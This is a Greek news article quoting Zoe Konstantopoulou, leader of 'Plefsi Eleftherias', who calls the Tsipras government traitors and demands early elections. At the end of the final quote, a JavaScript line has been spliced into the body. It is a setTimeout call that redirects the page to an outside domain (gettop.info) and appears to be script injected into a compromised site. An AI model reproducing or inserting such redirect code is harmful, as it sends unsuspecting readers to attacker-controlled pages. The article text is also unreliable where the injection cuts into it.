Κωνσταντοπούλου: Θα αγωνιστώ να ανατραπεί αυτή η κυβέρνηση

0
3

 

Θα αγωνιστώ να ανατραπεί πλήρως αυτή η κυβέρνηση, να ανατραπεί, να καταρριφθεί και να εξοβελιστεί πλήρως αυτό το καθεστώς, δήλωσε η πρόεδρος της «Πλεύσης Ελευθερίας» Ζωή Κωνσταντοπούλου.

Επίσης, μίλησε για τα σχέδιά της, την πολιτική που ακολουθεί η κυβέρνηση αλλά και την απόσταση που την χωρίζει από αυτήν στην πρωινή εκπομπή του ΑΝΤ1.

«Έχουν γίνει τα πολλαπλάσια, ό,τι φοβηθήκαμε το πάθαμε και χειρότερα… Όλα έγιναν.. Όλα τα αλλιώς θα. Και θα γίνουν ακόμη χειρότερα. Έχουμε φθάσει να έχουν μηδενικό μισθό οι νέοι άνθρωποι. Δεν έχει πάτο, δεν έχει τέρμα, αν δεν ξεσηκωθεί ο κόσμος δνε θα αλλάξει τίποτα. Δεν έχει τέλος αυτή η μνημονιακή επιβολή. Δνε θέμα ούτε πρώτης ούτε δεύτερης ούτε 25ης αξιολόγησης» επεσήμανε και μετά καυστικά σημείωσε:

«Έχουμε μια κυβέρνηση προδοτών. Δεν είναι κυβέρνησηο ύτε της Αριστεράς ούτε της Δεξιάς, ειναι κυβέρνηση προδοτών, όπως ήταν και οι προηγούμενες κυβερνήσεις» και συμπλήρωσε «το μνημόνιο αποτελεσεί εσχάτη προδοσία κι έγκλημα κατά της ανθρωπότητας».

«Αυτήν τη στιγμή η ευθύνη της κυβέρνησης Τσίπρα είναι βαρύτερη από τις ευθύνες των προηγούμενων γιατί η κυβέρνηση Τσίπρα μαζί με όλους τους μνημονιακούς παραβίασε την ευθεία λαϊκή εντολή. Αυτό αποτελεί το αποκορύφωμα, το απαύγασμα της προδοτικής συμπεριφοράς και πρέπει να αποδοθεί δικαιοσύνη» είπε καυστικά.

«Το χάσμα είναι αγεφύρωτο…» είπε χαρακτηριστικά ενώ σημείωσε ότι πρέπει να έχουμε εκλογές το συντομότερο δυντό ενώ κάλεσε τον λαό να διεκδικήσει τις εκλογές.

«Η κυβέρνηση έχει πολλές συμμαχίες προδοσίας, έχει πολλούς που θέλουν να την κρατήσουν ακόμη κι ως πτώμα στην εξουσία προκειμένου να συνεχίσει να υλοποιεί μνημόνια«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here